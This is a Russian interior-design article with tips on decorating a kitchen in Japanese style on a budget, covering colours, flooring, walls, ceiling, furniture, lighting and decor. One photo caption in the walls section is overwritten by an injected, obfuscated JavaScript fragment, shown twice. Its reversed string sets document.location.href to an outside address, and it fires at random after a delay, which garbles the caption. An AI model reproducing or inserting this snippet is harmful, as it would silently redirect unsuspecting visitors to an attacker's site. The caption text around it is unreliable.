Добавить в закладки

7 основ бюджетного и красивого оформления кухни в японском стиле

Кухня в японском стиле – это всегда особая часть помещения, характеризующаяся использованием природных материалов, функциональностью, сдержанностью и роскошью одновременно. Для помещений, оформленных в этом направлении присущи естественные цвета, ровные линии, приглушенный цвет и неброский декор.

Кухня в японском стиле

Кухня в японском стиле. Фото: jkuhnya.ru

Материалы и цвета

Не всегда есть возможность использовать природные материалы, поэтому они заменяются более доступными, но похожими по смыслу.

В основном цветовая гамма составляется из бежевых, коричневых, зеленых, вишневых, серых и черных оттенков. Акцентные нотки могут быть медового, синего, голубого цвета. Применение снежно-белого цвета недопустимо, поэтому его заменил кремовый и молочный. Одновременно можно использовать не больше трех цветов. Кухня в подобных оттенках будет удачным решением, как для больших, так и для маленьких помещений.

Интерьер кухни в японском стиле с использованием трех оттенков и акцентов в красном цвете

Интерьер кухни в японском стиле с использованием трех оттенков и акцентов в красном цвете. Фото: i.pinimg.com

Пол

По традиции напольное покрытие должно быть из натурального дерева. Его можно заменять другими настилами, имитирующими деревянную фактуру. С этой задачей успешно справится ламинат, паркет, линолеум и даже керамогранит.

Деревянный пол на кухне в японском стиле

Деревянный пол на кухне в японском стиле. Фото: www.corner.com.ua

Стены

Отделка стен выполняется обоями или декоративной штукатуркой. Обозначить рабочие зоны можно с помощью разделения их деревянными или пластиковыми панелями, а также фотообоями с тематическим рисунком. Роль перегородки седзи может сыграть одна из стен с ПВХ-панелью в японском стиле.

Кухонный фартук выкладывается искусственным камнем, мозаикой с его имитацией или скинали с японским рисунком.

Фартук из скинали на кухне в японском стиле

Фартук из скинали на кухне в японском стиле. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tokuhni.com»>www.fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tokuhni.com

Потолок

Для оформления потолка проще всего использовать краску или известь. В помещениях с высоким потолком можно сделать конструкцию из балочных перегородок в форме небольших квадратов. Внутри каждого можно натянуть матовое полотно с рисунком или воспользоваться краской.

Балочная конструкция на потолке кухни в японском стиле

Балочная конструкция на потолке кухни в японском стиле. Фото: vsekuhni.net

Мебель

Линии деревянного неокрашенного гарнитура должны быть строгими. Лучше всего подходят легкие узкие шкафчики без фурнитуры. Уместно смотрятся фасады с фрагментами седзи, сделанного с помощью матового стекла и обрешетки. Бытовую технику лучше всего спрятать за дверцы мебели.

Мебель с обрешеткой на кухне в японском стиле

Мебель с обрешеткой на кухне в японском стиле. Фото: akuhnja.com

Освещение

Добиться рассеянного освещения, характерного для японского стиля, поможет внутренняя потолочная подсветка, которую можно установить и рабочих поверхностях. Люстры должны иметь четкие контуры в сферичной, квадратной или прямоугольной форме. Плафоны из соломы, рисовой бумаги, плетеного бамбука сделают помещение еще более атмосферным.

Освещение на кухне в японском стиле

Освещение на кухне в японском стиле. Фото: ciscoexpo.ru

Декор

В качестве аксессуаров используйте восточную посуду, тематические статуэтки, вазочки, живые растения, среди которых будет дерево бонсай. На стенах можно развесить свитки с цитатами японских мудрецов, гравюры.

Декор на кухне в японском стиле

Декор на кухне в японском стиле. Фото: jkuhnya.ru

Оформление кухни в японском стиле смотрится стильно и оригинально.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 10.07.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: